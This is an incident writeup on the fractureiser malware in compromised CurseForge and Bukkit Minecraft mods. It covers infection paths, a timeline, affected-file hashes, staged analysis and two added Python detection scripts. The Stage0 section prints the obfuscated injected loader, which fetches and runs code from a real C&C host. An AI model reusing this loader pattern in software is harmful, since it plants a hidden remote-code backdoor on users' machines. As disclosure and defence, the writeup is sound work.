Curseforge, a popular site for Minecraft mods, has been compromised. Multiple modpacks and mods have been modified to include malicious code from a third party.
It seems this compromise happened weeks ago; files from as far back as the 20th May April have been confirmed to be backdoored.
Details here
The CF Malware “fractureiser” - What We Know
The only official channel run by the same team that wrote this writeup is #cfmalware on EsperNet IRC — we do not have a Discord. You may join the channel if you wish — due to an influx of new users we’ve set the channel +m, you will need permission to speak. Joining an IRC channel will expose your IP address.
We’ve dubbed this malware fractureiser because that’s the name of the CurseForge account that uploaded the most notable malicious files. Other suggested names are neko.run and fractureneko.
Investigation has slowed down as we believe we’ve learned all we can with what we have currently. We have picked apart Stage0 and Stage1, taken down the C&C, and have potential Stage2 and Stage3 files with little interesting info in them. If you are infected, please give us a copy of the libWebGL64.jar (Stage2) file if you still have it. We’re focusing on cleaning up this writeup and getting everything we know written down.
If you have files relevant to this malware, please upload them to https://wormhole.app and email the URL to fractureiser.investigation@opayq.com — this inbox is controlled by xylemlandmark, and anything sent to it will be shared with the rest of the team. Please also let us know if you have the ability to download files from VirusTotal, as that would let us get ahold of many of the files we’re missing.
If you copy portions of this document elsewhere, please put a prominent link back to this HackMD page somewhere near the top so that people can read the latest updates and get in contact.
Non-technical overview [READ ME!]
Notice: Plugins with similar malware have been found as early as mid-April.
A number of Curseforge and dev.bukkit.org (not the Bukkit software itself) accounts have been compromised, and malicious software was injected into copies of many popular plugins and mods. Some of these malicious copies have been injected into popular modpacks including Better Minecraft. There are reports of malicious plugin/mod JARs as early as May 22nd.
Until further notice, do not use the official Curseforge launcher, or download anything from Curseforge or the Bukkit plugin repository. While the control server for this malware is currently offline, any download from Curseforge or the Bukkit plugin repository in the last 2-3 weeks should be treated as potentially malicious. This malware is unlikely to be detected by Windows Defender or similar antimalware products.
If you have downloaded any mods from Curseforge, or plugins from Bukkit, even through clients such as Prism Launcher or the official Curseforge launcher, it is recommended that you follow the “Am I infected?” guide below.
The affected accounts had two-factor authentication enabled. It’s unlikely this is a simple password compromise situation; it may be auth token compromise or something bigger on the CF side. Multiple accounts are affected so we don’t believe this is isolated.
Currently, we do not suspect other platforms such as Modrinth to be affected.
What’s at stake?
If you got infected while the C&C server was still up, you may have had your browser database and Windows credential store dumped. This includes your Windows Microsoft account, vanilla Minecraft launcher account, and god knows what else. The jar file that does these things is unconfirmed, but we believe it is related to this outbreak.
Right now, the malware is dormant due to the loss of its C&C server and the Stage0 (what was distributed via mods and modpacks) not having a way to get a new server. We still do not know how the compromise occurred; we are waiting for a response from Curseforge. If you were infected with Stage2 (the file described below, dropped by Stage1 when C&C was up), then the malware is still active.
Am I infected?
You can check whether the malware ever ran on your computer, since Stage1 attempts to create files at several unusual paths:
- Linux: ~/.config/.data/lib.jar
- Windows: %LOCALAPPDATA%\Microsoft Edge\libWebGL64.jar (or ~\AppData\Local\Microsoft Edge\libWebGL64.jar)
- Make sure to show hidden files when checking
- Yes, “Microsoft Edge” with a space. MicrosoftEdge is the legitimate directory used by actual Edge.
- Also check the registry for an entry at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- Or a shortcut in %appdata%\Microsoft\Windows\Start Menu\Programs\Startup
- All other OSes: Unaffected. The malware is hardcoded for Windows and Linux only. It is possible it will receive an update adding payloads for other OSes in the future.
Before downloading, the malware will create the enclosing directory if it does not exist. Windows/MS Edge does not use the “Microsoft Edge”-with-a-space directory, and Linux software does not use ~/.config/.data, so these folders existing is a likely sign that Stage1 has executed on a victim computer.
If Stage2 successfully downloads, it will attempt to make itself start on boot by modifying the Windows registry, or dropping a systemd unit into /etc/systemd. (The Linux side of this payload is unlikely to work as it requires root privileges.)
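An added example, not part of the writeup: a Python checker for the indicators listed above (the two drop directories and jars, Startup shortcuts, the HKCU Run key, and systemd units naming the jar). Base directories are parameters so it can be pointed at a mounted profile as well as the live machine; the Run-key check uses the standard-library winreg module and only runs on Windows; the demo tree it builds is constructed and contains no malware.

```python
import os
import platform
import tempfile
from pathlib import Path

# Indicators from the writeup: Stage1 drop paths (with their unusual enclosing
# directories) and Stage2 persistence points. Base directories are parameters.
LINUX_DIR = Path(".config") / ".data"                  # under $HOME
WIN_DIR = Path("Microsoft Edge")                        # under %LOCALAPPDATA%, note the space
STARTUP_DIR = Path("Microsoft/Windows/Start Menu/Programs/Startup")  # under %APPDATA%
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
JAR_NAMES = ("libWebGL64.jar", "lib.jar")


def _mentions_jar(blob: bytes) -> bool:
    """True if a shortcut, unit file or command line names either jar (ASCII or UTF-16LE)."""
    low = blob.lower()
    return any(j.lower().encode() in low or j.lower().encode("utf-16-le") in low
               for j in JAR_NAMES)


def check_filesystem(home: Path, localappdata: Path, appdata: Path, etc: Path) -> list:
    """Findings for the directory, jar, Startup-shortcut and systemd indicators."""
    findings = []
    for label, d, jar in (("Linux", home / LINUX_DIR, "lib.jar"),
                          ("Windows", localappdata / WIN_DIR, "libWebGL64.jar")):
        if d.is_dir():  # the directory alone already means Stage1 executed
            findings.append(f"{label}: directory {d} exists (Stage1 has run)")
        if (d / jar).is_file():
            findings.append(f"{label}: Stage2 {d / jar} present (still active)")
    startup = appdata / STARTUP_DIR
    if startup.is_dir():
        for lnk in startup.glob("*.lnk"):
            if _mentions_jar(lnk.read_bytes()):
                findings.append(f"Windows: Startup shortcut {lnk.name} launches the jar")
    systemd = etc / "systemd"
    if systemd.is_dir():
        for unit in systemd.rglob("*.service"):
            if _mentions_jar(unit.read_bytes()):
                findings.append(f"Linux: systemd unit {unit} references the jar")
    return findings


def check_run_key() -> list:
    """Windows only: HKCU Run values whose command line references the jar."""
    if platform.system() != "Windows":
        return []
    import winreg  # standard library, Windows only
    findings, i = [], 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)
            except OSError:  # no more values
                break
            if _mentions_jar(str(value).encode()):
                findings.append(f"Windows: Run value {name!r} = {value}")
            i += 1
    return findings


def check_live_host() -> list:
    """Run every check against this machine's own profile directories."""
    home = Path.home()
    lad = Path(os.environ.get("LOCALAPPDATA", home / "AppData" / "Local"))
    ad = Path(os.environ.get("APPDATA", home / "AppData" / "Roaming"))
    return check_filesystem(home, lad, ad, Path("/etc")) + check_run_key()


def run_demo() -> list:
    """Constructed infected-looking tree (no real malware) in a temp dir."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "home" / LINUX_DIR).mkdir(parents=True)
        (root / "home" / LINUX_DIR / "lib.jar").write_bytes(b"PK\x03\x04")
        (root / "lad" / WIN_DIR).mkdir(parents=True)  # directory only, jar absent
        (root / "ad" / STARTUP_DIR).mkdir(parents=True)
        (root / "ad" / STARTUP_DIR / "Edge.lnk").write_bytes(
            b"L\x00\x00\x00" + "libWebGL64.jar".encode("utf-16-le"))
        return check_filesystem(root / "home", root / "lad", root / "ad", root / "etc")


if __name__ == "__main__":
    for line in (check_live_host() if os.environ.get("LIVE") else run_demo()):
        print(line)
```

Set LIVE=1 to check the current user profile instead of the demo tree; an empty result means none of the listed indicators were found, not that a machine is clean.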
Given a jar file, how do I know if it’s safe?
There are various heuristics you can use to determine whether a jar is infected with Stage0.
Emi’s shell script here simply checks for all usages of ClassLoader, which is uncommon in mod code. This can lead to false positives and negatives. For example, it falsely flags the latest Quark 1.19 file as infected when it is not.
Sylv’s shell script here does a bit more fingerprint matching for the malware, and should be more precise.
As a non-technical user, your best course of action is to check if your system was affected using the above steps, removing all mods that were downloaded in the last several weeks, and refraining from downloading anything from CurseForge or dev.bukkit.org until further notice.
Timeline
2023-06-07 6:27 UTC
Investigation has slowed down and most of the team is going to bed. xylemlandmark has opened an email inbox for people to submit samples or other useful information. williewillus is currently working to clean up and get the information presented by Shadowex3 into this doc.
2023-06-07 6:20 UTC
Shadowex3 informs the unofficial Discord that they have a copy of the full (untruncated) Stage 3 client.jar, as well as an in-depth analysis of what the malware is doing.
2023-06-07 5:27 UTC
We’ve discovered a potential Stage 3 file; it is heavily obfuscated and contains a native payload DLL that attempts to steal credentials from the Windows credentials store.
2023-06-07 4:57 UTC
Files uploaded in April have been discovered; either the dates are being spoofed, or this has been going on even longer. Many of the accounts have Last Active times in 1999 — likely a quirk with old CurseForge accounts, but still notable.
Modrinth staff are investigating if any uploads on there are compromised. A quick pass they did through recently updated projects looked OK.
2023-06-07 4:40 UTC
The scope of this compromise seems larger than initially realized. The malicious files go back multiple weeks, as early as May 20th. We only noticed today because they compromised a popular modpack.
2023-06-07 3:38 UTC
The C&C server has been taken down by the server provider. A new one will likely come up if the Cloudflare page stays up; we’re monitoring it.
2023-06-07 3:26 UTC
We were sent a possible Stage 2 jar by an anonymous user who claims to work at a server host.
2023-06-07 2:26 UTC
The #cfmalware EsperNet channel is created to coordinate discussion that had been happening in multiple Discord guilds and Matrix spaces.
2023-06-07 0:40 UTC
The team behind this document learns of the malicious files included in an unauthorized update to Better Minecraft.
Technical info
Distribution
Some modpacks have had updates published for them without the knowledge of the authors, adding a dependency on malicious mods. These modpack updates were archived immediately after uploading, meaning they do not show on the web UI, only via the API.
We cannot tell if the malicious mods were always malicious, or if they got edited. They have upload dates multiple weeks in the past. A CDN compromise or cache poisoning attack is not out of the question due to Curse’s usage of the extremely outdated and insecure MD5 to verify downloads.
Known affected mods & plugins
At this point, we have enough samples to know this is quite widespread. Documenting more is likely a waste of time. Just consider all mods and plugins downloaded from CurseForge and BukkitDev to be compromised.

mod/plugin | link | SHA1 | “Uploader” |
---|---|---|---|
Skyblock Core | [www.curseforge.com]/minecraft/mc-mods/skyblock-core/files/4570565 | 33677CA0E4C565B1F34BAA74A79C09A3B690BF41 | Luna Pixel Studios |
Dungeonz | [legacy.curseforge.com]/minecraft/mc-mods/dungeonx/files/4551100 | 2DB855A7F40C015F8C9CA7CBAB69E1F1AAFA210B | fractureiser |
Haven Elytra | [dev.bukkit.org]/projects/havenelytra/files/4551105 and [legacy.curseforge.com]/minecraft/bukkit-plugins/havenelytra/files/4551105 | 284A4449E58868036B2BAFDFB5A210FD0480EF4A | fractureiser |
Vault Integrations | [www.curseforge.com]/minecraft/mc-mods/vault-integrations-bug-fix/files/4557590 | 0C6576BDC6D1B92D581C18F3A150905AD97FA080 | simpleharvesting82 |
AutoBroadcast | [www.curseforge.com]/minecraft/mc-mods/autobroadcast/files/4567257 | C55C3E9D6A4355F36B0710AB189D5131A290DF26 | shyandlostboy81 |
Museum Curator Advanced | [www.curseforge.com]/minecraft/mc-mods/museum-curator-advanced/files/4553353 | 32536577D5BB074ABD493AD98DC12CCC86F30172 | racefd16 |
Vault Integrations Bug fix | [www.curseforge.com]/minecraft/mc-mods/vault-integrations-bug-fix/files/4557590 | 0C6576BDC6D1B92D581C18F3A150905AD97FA080 | simplyharvesting82 |
Floating Damage | [dev.bukkit.org]/projects/floating-damage | 1d1aaccdc13244e980c0c024610ecc77ea2674a33a52129edf1bb4ce3b2cc2fc | mamavergas3001 |
Display Entity Editor | [www.curseforge.com]/minecraft/bukkit-plugins/display-entity-editor/files/4570122 | A4B6385D1140C111549D95EAB25CB51922EEFBA2 | santa_faust_2120 |
Darkhax sent this: https://gist.github.com/Darkhax/d7f6d1b5bfb51c3c74d3bd1609cab51f
Potentially more: Sophisticated Core, Dramatic Doors, Moonlight lib, Union lib
Stage0 (Infected mod jars)
Affected mods have a new static void method inserted into their main class, and a call to this method is inserted into that class’s static initializer. For DungeonZ, the method is named _d1385bd3c36f464882460aa4f0484c53 and exists in net.dungeonz.DungeonzMain. For Skyblock Core, the method is named _f7dba6a3a72049a78a308a774a847180 and is inserted into com.bmc.coremod.BMCSkyblockCore. For HavenElytra, the code is inserted directly into the otherwise-unused static initializer of valorless.havenelytra.HavenElytra.
The method’s code is obfuscated, using new String(new byte[]{...}) instead of string literals.
From Shadowex3’s sample of “Create Infernal Expansion Plus”, a copycat version of “Create Infernal Expansion Compat” with malware inserted into the main mod class:
    static void _1685f49242dd46ef9c553d8af1a4e0bb() {
        Class.forName(new String(new byte[] {
            // "Utility"
            85, 116, 105, 108, 105, 116, 121
        }), true, (ClassLoader) Class.forName(new String(new byte[] {
            // "java.net.URLClassLoader"
            106, 97, 118, 97, 46, 110, 101, 116, 46, 85, 82, 76, 67, 108, 97, 115, 115, 76, 111, 97, 100, 101, 114
        })).getConstructor(URL[].class).newInstance(new URL[] {
            new URL(new String(new byte[] {
                // "http"
                104, 116, 116, 112
            }), new String(new byte[] {
                // "85.217.144.130" (the C&C host)
                56, 53, 46, 50, 49, 55, 46, 49, 52, 52, 46, 49, 51, 48
            }), 8080, new String(new byte[] {
                // "/dl"
                47, 100, 108
            }))
        })).getMethod(new String(new byte[] {
            // "run"
            114, 117, 110
        }), String.class).invoke((Object) null, "-114.-18.38.108.-100");
    }
This:
- Creates a URLClassLoader with the URL http://[85.217.144.130:8080]/dl
- Loads and calls Utility.run with a String argument using that classloader (fetching code from the internet); the argument is different for each infected mod (!)
  - Skyblock Core: “-74.-10.78.-106.12”
  - Dungeonz: “114.-18.38.108.-100”
  - HavenElytra: “-114.-18.38.108.-100”
  - Vault Integrations: “-114.-18.38.108.-100”
The creation of the classloader is hardcoded to that URL and does not use the Cloudflare URL that Stage 1 does. As that IP is now offline, this means the Stage 0 payloads we are presently aware of no longer function.
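An added example, not part of the writeup and not either of the shell scripts it links from the “Given a jar file, how do I know if it’s safe?” section: a Python scanner that reads each class’s constant pool and looks for the symbolic references the Stage0 method above cannot hide in byte arrays (the ClassLoader cast, URLClassLoader, Class.forName, Method.invoke and the String(byte[]) constructor). It reports both an Emi-style loose verdict (any ClassLoader reference) and a stricter one requiring the full reflective-loader combination. The class names and the jar it scans by default are constructed fixtures.

```python
import io
import struct
import zipfile

# Byte size of the constant-pool entry bodies we skip (tag -> bytes);
# Long (5) and Double (6) additionally occupy two pool slots.
_SKIP = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

# new String(new byte[]{...}) hides string literals, but class, method and
# descriptor references still live in the constant pool as Utf8 entries.
STAGE0_MARKERS = ("java/net/URLClassLoader", "java/lang/ClassLoader",
                  "java/net/URL", "forName", "getMethod", "invoke", "([B)V")
STRICT_SET = {"java/net/URLClassLoader", "forName", "invoke", "([B)V"}


def utf8_constants(class_bytes: bytes) -> list:
    """Return every CONSTANT_Utf8 entry from a .class file's constant pool."""
    if class_bytes[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    (count,) = struct.unpack(">H", class_bytes[8:10])
    pos, idx, found = 10, 1, []
    while idx < count:
        tag = class_bytes[pos]
        pos += 1
        if tag == 1:
            (length,) = struct.unpack(">H", class_bytes[pos:pos + 2])
            pos += 2
            found.append(class_bytes[pos:pos + length].decode("utf-8", "replace"))
            pos += length
        else:
            pos += _SKIP[tag]
        idx += 2 if tag in (5, 6) else 1
    return found


def classify_class(class_bytes: bytes) -> set:
    """Stage0 markers present in one class's constant pool."""
    pool = set(utf8_constants(class_bytes))
    return {m for m in STAGE0_MARKERS if m in pool}


def scan_jar(jar_bytes: bytes) -> dict:
    """Per-class markers plus two verdicts: 'loose' mirrors the any-ClassLoader
    rule (prone to false positives), 'strict' requires the reflective-loader
    combination used by the injected Stage0 method."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                hits = classify_class(jar.read(name))
                report[name] = {"markers": sorted(hits),
                                "loose": any("ClassLoader" in h for h in hits),
                                "strict": STRICT_SET <= hits}
    return report


def make_class(utf8_entries: list) -> bytes:
    """Constructed fixture: magic, version and a constant pool only (enough for
    the parser, not loadable by a JVM). A CONSTANT_Class and a two-slot
    CONSTANT_Long are appended so the skip logic is exercised as well."""
    body = b"".join(b"\x01" + struct.pack(">H", len(s)) + s.encode("utf-8")
                    for s in utf8_entries)
    body += b"\x07\x00\x01" + b"\x05" + bytes(8)
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, len(utf8_entries) + 4) + body


def make_sample_jar() -> bytes:
    """Constructed jar: one class whose pool mimics the injected method, one
    harmless class that merely loads a resource through a ClassLoader."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("com/example/InfectedMain.class", make_class([
            "java/lang/Class", "forName", "java/lang/ClassLoader",
            "java/net/URLClassLoader", "java/net/URL", "<init>",
            "(Ljava/lang/String;Ljava/lang/String;ILjava/lang/String;)V",
            "java/lang/String", "([B)V", "getMethod", "invoke"]))
        jar.writestr("com/example/ResourceHelper.class", make_class([
            "java/lang/ClassLoader", "getResourceAsStream",
            "(Ljava/lang/String;)Ljava/io/InputStream;"]))
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else make_sample_jar()
    for cls, info in scan_jar(data).items():
        print(f"{cls}: strict={info['strict']} loose={info['loose']} {info['markers']}")
```

Pass a jar path as the first argument to scan a real file; a strict hit is worth a manual look, and a clean strict result says nothing about payloads that use a different loader pattern.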
Stage1 (dl.jar)
SHA-1: dc43c4685c3f47808ac207d1667cc1eb915b2d82
Decompiled copy of Utility from the malware.
The very first thing Utility.run does is check if the system property neko.run is set. If it is, it will immediately stop executing. If not, it sets it to the empty string and continues. This appears to be a very simplistic way of avoiding the same process running the malware multiple times, such as if it had multiple infected mods.
It attempts to contact 85.217.144.130, and a Cloudflare Pages domain (https://[files-8ie.pages.dev]/ip). Yes, people have already reported abuse. The Pages domain is used to retrieve the IP of the C&C server if the first IP no longer responds. Due to a bug in the fallback, the Cloudflare page is never actually contacted. This means the version of Stage1 we are presently aware of is completely dead.
The C&C IP has been nullrouted after an abuse report to the server provider. We will need to keep an eye on the Cloudflare page to see if a new C&C server is stood up; I can’t imagine they didn’t plan for this. Thank you Serverion for your prompt response.
It attempts to drop itself into the paths listed above and will attempt to infect Linux. Through these paths it hopes to establish persistence so that when Stage2 is/was ready, it could then be downloaded and run. Rumor has it there’s a way for it to privilege escalate, but that seems unlikely and is unconfirmed. It is likely trying to compromise misconfigured systems.
Compromised mods have a static initializer block in their main class that bootstraps this stage. This isn’t some off-the-shelf malware that’s been uploaded to Curse (that’s been done before, and isn’t useful because mod loaders don’t run a JAR’s Main-Class), it’s actual malicious versions of mods with code injected, potentially automatically.
Stage2 (“lib.jar” or “libWebGL64.jar”)
Stage1 connects to port 8083 on the C&C server (85.217.144.130) and sends the host’s IP as a knock, and every time we’ve attempted to get the payload there’s no response. This could indicate a few things:
- Stage 2 does not exist yet, and it will be dropped at a later date to curb exactly this kind of effort. Existing sockets will get the payload streamed to them and it will get run. Now that the first C&C is down, this can’t happen.
- Stage 2 already existed, and the server was taken offline to prevent reverse engineering.
- This is a targeted attack, and only certain IPs will get the payload sent to them.
Unconfirmed lib.jar (“Neko Client”) findings
Someone who works at a hosting company has sent us a lib.jar (Stage 2) that seems legit.
Partial reverse engineering of lib.jar (unmangled with https://github.com/java-deobfuscator/deobfuscator) gives https://gist.github.com/jaskarth/51196424dc0637cad8e7f275497b8da8 (Note: The decompiled obfuscated malicious code is very likely to be incomplete. This is useful for a broad overview of what the code may be doing, but isn’t representative of its full capabilities.)
References something called “Neko Client”, which might be a botnet.
Deobfuscated strings:
- An Allatori demo watermark (identical to the one in the zip comment)
- dev.neko.nekoclient.Client (is used in a Class.forName)
- start (appears to be a method name, used for reflection)
Stage3 (unconfirmed “client.jar”)
The client (2).jar we have our hands on is malformed (seemingly truncated), but can be “fixed” as follows: zip -FF client.jar --out clientfixed.jar, then decompiled.
It appears to contain a native payload hook.dll, decompiled: https://gist.githubusercontent.com/...f5ff74275ac44c2200d5121bfff652fd49/hook.dll.c
From preliminary analysis, it appears to be attempting to steal Microsoft account credentials from the Windows credential store.
There are two native functions meant to be called from Java, as they are JNI callable:
- __int64 __fastcall Java_dev_neko_nekoclient_api_windows_WindowsHook_retrieveClipboardFiles(__int64 a1);
- __int64 __fastcall Java_dev_neko_nekoclient_api_windows_WindowsHook_retrieveMSACredentials(__int64 a1);
Other Stuff
The main payload server was (until it got taken down) hosted on Serverion, a company based in the Netherlands. Other than an HTTP server on port 80/443 and an SSH server on port 22 (don’t try to attack this, attacking SSH is a fools’ errand), the following ports were open on 85.217.144.130:
- 1337
- 1338 (a port referenced in stage 1’s file for creating a new Debugger connection)
- 8081 (this is a WebSocket server - no apparent function right now, not referenced in any malicious code)
- 8082 (nobody’s gotten anything out of this one, not referenced in any malicious code)
- 8083 (contacted by stage 1)
If you downloaded anything from CurseForge in the last month, check these locations for these files; if you find them, delete them:
- Linux: ~/.config/.data/lib.jar
- Windows: %LOCALAPPDATA%\Microsoft Edge\libWebGL64.jar (or ~\AppData\Local\Microsoft Edge\libWebGL64.jar)
Right now the C&C server is down and it’s unknown what the malware does after infection, most likely a botnet or something.